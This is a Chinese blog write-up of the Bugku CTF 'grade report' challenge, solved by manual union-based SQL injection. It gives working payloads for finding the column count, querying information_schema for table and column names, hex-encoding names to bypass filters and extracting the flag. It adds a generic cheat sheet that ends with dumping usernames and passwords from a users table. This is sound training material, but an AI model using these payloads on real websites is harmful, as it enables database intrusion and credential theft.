bugku 成绩单详解

最新推荐文章于 2022-08-28 11:42:39 发布
最新推荐文章于 2022-08-28 11:42:39 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35811830/article/details/86655279
版权

bugku 成绩单详解

首先打开查询成绩的页面
在这里插入图片描述在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4
在这里插入图片描述
当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。
在这里插入图片描述
因此我们可以猜测数据库里面一共是有四列的
然后在此处利用内置函数database()爆破获取数据库的名字。
在这里插入图片描述至于为什么使用union select 的时候再后面添加1,2,3,这几个数字纯粹是凑数的,凑够和union关键字前面的那个表的字段数一样,不然没法拼接成一个表。在sql注入的时候,在将相应位置替换成你想获得的数据,查询结果后面就会显示出来。
此处可以看出数据库的名字叫做skctf_flag

这里记一点零碎的知识:
mysql中的information_schema 结构用来存储数据库系统信息

用该语句得到当前库的所有表
select group_concat(table_name) from information_schema.tables where table_schema=database()

得到表中的字段名 将敏感的表进行16进制编码

现在我们去爆破表名
在这里插入图片描述
得到表名fl4g,sc,可知我们需要的数据在fl4g这个表里

将fl4g转换为十六进制(使用十六进制绕过敏感词)
在这里插入图片描述

得到表中的字段名 将敏感的表进行16进制编码

select group_concat(column_name) from information_schema.columns where table_name=0x666c3467#
在这里插入图片描述

得到字段具体的值

select group_concat(username,0x3a,password) from adminuser
在此处我们构造union select 1,2,3,skctf_flag from fl4g#

在这里插入图片描述
爆破出BUGKU{Sql_INJECT0N_4813drd8hz4}
完成。

可以加我扣扣交流QQ:2585614464

在 HacTF的博客中看到的,这里引用一下,可以方便记忆,但是更具体的应该是需要系统的学习数据库的只是CIA能够掌握了,这也是自己下一个阶段的目标。

1.判断是否存在注入,注入是字符型还是数字型

抓包更改参数id为

1′ or 1=1 #

2.猜解SQL查询语句中的字段数

1 order by 2 #
1 order by 3 #

3.确定显示的字段顺序

1 union select 1,2 #

4.获取当前数据库

1 union select 1,database() #

5.获取数据库中的表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

6.获取表中的字段名

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #

7.下载数据

1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

「已注销」
关注
专栏目录
SPI协议详解(图文并茂+超详细)
一名热爱技术的工程师的博客。分享技术干货,记录美好生活。永远相信美好的事情即将发生。
11-03 26万+
先说串口 因为之前写过一篇UART,通用串行异步通讯协议,UART的相关资料 因为UART没有时钟信号,无法控制何时发送数据,也无法保证双发按照完全相同的速度接收数据。因此,双方以不同的速度进行数据接收和发送,就会出现问题。 如果要解决这个问题,UART为每个字节添加额外的起始位和停止位,以帮助接收器在数据到达时进行同步; 双方还必须事先就传输速度达成共识(设置相同的波特率,例如每秒9600位)。 传输速率如果有微小差异不是问题,因为接收器会在每个字节的开头重新同步。相应的协议如下图所示; 如果您注意到
bugku 成绩单
rommel的博客
08-23 7266
成绩查询 龙龙龙的成绩单 Math English Chinese 60 60 70 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1' union select 1,2,3,database(
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3502
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
bugku---成绩单
LuckySec
11-16 526
题目 http://123.206.87.240:8002/chengjidan/index.php 使用sqlmap进行注入 首先输入检测是否有注入点 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u “http://123.206.87.240:8002/chengjidan/index.php” --d...
BugKu——成绩单
D-R0s1的博客
10-08 914
  sql注入在CTF类竞赛中占着很大的比重,在做BugKu的题目的过程中恰好遇到了一个没有任何过滤,直接注入的题目,因为没有过滤,只是单纯的考察sql注入,所以步骤比较固定,语句也比较简单 1.首先,爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1,2,3都有回显,然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...
Bugku成绩单
Newbiek的博客
04-02 962
首先,正常输入测试: Burp发现其为post包,只有1到3可以进行查询: 加单引号测试发现,这是一个注入点: 猜测注入的类型,发现and 1=1没有变化,但是1=2也没有变化: 不是数字型注入就试试字符型注入: 下一步就到了测试页面回显的地方的时候了,因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列(可能还有隐藏的东西): 确认了回显...
BugKu成绩单
Tle_Camouflage的博客
08-23 1487
成绩单(Web) 输入1并进行抓包。 然后按右键,点击copy to file保存文件,这里我保存到了C盘 333.txt。 然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db -r –> 加载一个文件 -p –>指定参数 –current-db –>获取当前数据库名称(current前有...
Bugku 可爱的故事 详解 MISC
fi0stBlooder的博客
07-02 1459
Bugku MISC 可爱的故事一、题目二、思路三、复现四、总结 我会不定时更新bugku的题目,和大家共同学习,披荆斩棘。日拱一卒,你的付出,终将使你强大。希望大家喜欢,多多点赞收藏谢谢。 一、题目 下载完成加压后由三个文件,两张图片一个提示。 提示内容为: 图片为不知道的一种语言。 二、思路 1、仔细观察提示,管家你信息找到一段带bugku的话语。 2、这道题其实靠的是游戏原神中的“提瓦特文”。仔细观察,不难发现,提瓦特文其实就是大写字母经过上下或者左右翻转后的结果,再添加一些哥特风格。
Bugku——逆向入门详解
1匹黑马
03-26 2200
文章目录逆向入门解题 逆向入门 题目地址:逆向入门 解题 下载下来发现打不开,我还以为是要换个32位的操作系统,后来才发现是我想多了… 把程序拖进IDA,切到十六进制发现是一张图片,只不过需要编码转换: 这里我们可以使用HTML里的img镖标签,把内容都复制出来,保存到txt文档中先,然后加到标签里,就像这样: ...
Bugku MISC come_game 详解
fi0stBlooder的博客
07-01 2187
Bugku MISC come_game一、题目二、思路三、复现四、总结 我会不定时更新bugku的题目,和大家共同学习,披荆斩棘。日拱一卒,你的付出,终将使你强大。希望大家喜欢,多多点赞收藏谢谢。 一、题目 打开后发现是一个小游戏,游戏爱好者的福音。 二、思路 遇到这道题,一开始可能没有思路,但是不要紧,实践出真知,我们就放松心情快乐起来吧。 真的很难,手残,依然没有通关,此时我发现多了一个save1的文件夹。进入思想平行世界。玩了一把游戏出现了save1的字样,根据字面意思推断,可能为游戏存档。
Bugku 白哥的鸽子详解 MISC
fi0stBlooder的博客
07-03 1614
Bugku 白鸽的哥字 MISC一、题目二、思路三、复现四、总结 一、题目 二、思路 点击下载,是一张jpg的图片。 按照处理图片题的思路来 查看属性中的详细信息。 用winhex打开,查看信息。 图片分离技术 最低有效位隐藏信息 等等还有很多,就不一一赘述了,遇到问题自然就会解决了。 三、复现 右键属性,查看详细信息。并没有发现有价值的线索。 我们用winhex来打开这张图片。将鼠标滑倒最底部,发现了一点可疑信息。把它复制下来:fg2ivyo}l{2s3_o@aw__rcl@。
bugku 成绩单 总结
DreamHigh
08-28 2987
试题地址: http://40.125.170.89:49164/index.php 成绩查询     龙龙龙的成绩单 Math English Chinese 60 60 70 方法一:常规方法 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1...
成绩单bugku--web)
小白的劝退之路
04-29 441
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩 SQL注入应该没跑了 输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常,看来过滤了–+ 观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列 接下来就开始暴库名、表名、字段名 尝试联合查询,...
bugku 成绩查询
m0_51504576的博客
04-21 593
最近刚好在了解sql注入的一些知识,然后刚好刷到了这题,记录一下我的思路吧~ 看到题目页面一个输入框就觉得是和sql注入有关的题目了,首先查看网页源代码: 看到name=id,在火狐浏览器用maxhackerbar打开传递参数试试: 成功查到了成绩单,并且切换1,2,3都可以成功,再判断是字符型注入还是数值型注入: id=1成功查询,id=1’查询失败,id=1’#查询成功,所以该注入类型为字符型注入。 简单说明一下为什么: 如果是数值型注入:where id =1 成功 where id=1’失败 w
bugku成绩单
qq_43677324的博客
03-09 936
bugku成绩单 详细解析 1,我们首先分别输入1,2,3, 均有输出 我们输入1’ 没有回响 因此我们可以判断存在sql注入 2.我们分别输入 1' order by 1# 1' order by 2# 1' order by 3# 1' order by 4# 均有回响 但是当我们使用 1' order by 5# 时,没有回响 因此我们可以根据此判断字段数为4 3, 之后就是最精彩的地...
bugku-web-成绩单
a3uRa的一个窝
08-29 730
非常简单的sql注入 1 1’ 1‘# id=1' order by 1# id=1' order by 2# id=1' order by 3# id=1' order by 4# id=1' order by 5# id=' union select 1,2,3,4# id=' union select 1,2,3,database()# id=' union select 1,2,3,...
bugku--成绩查询
hxhabcd123的博客
08-28 1615
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值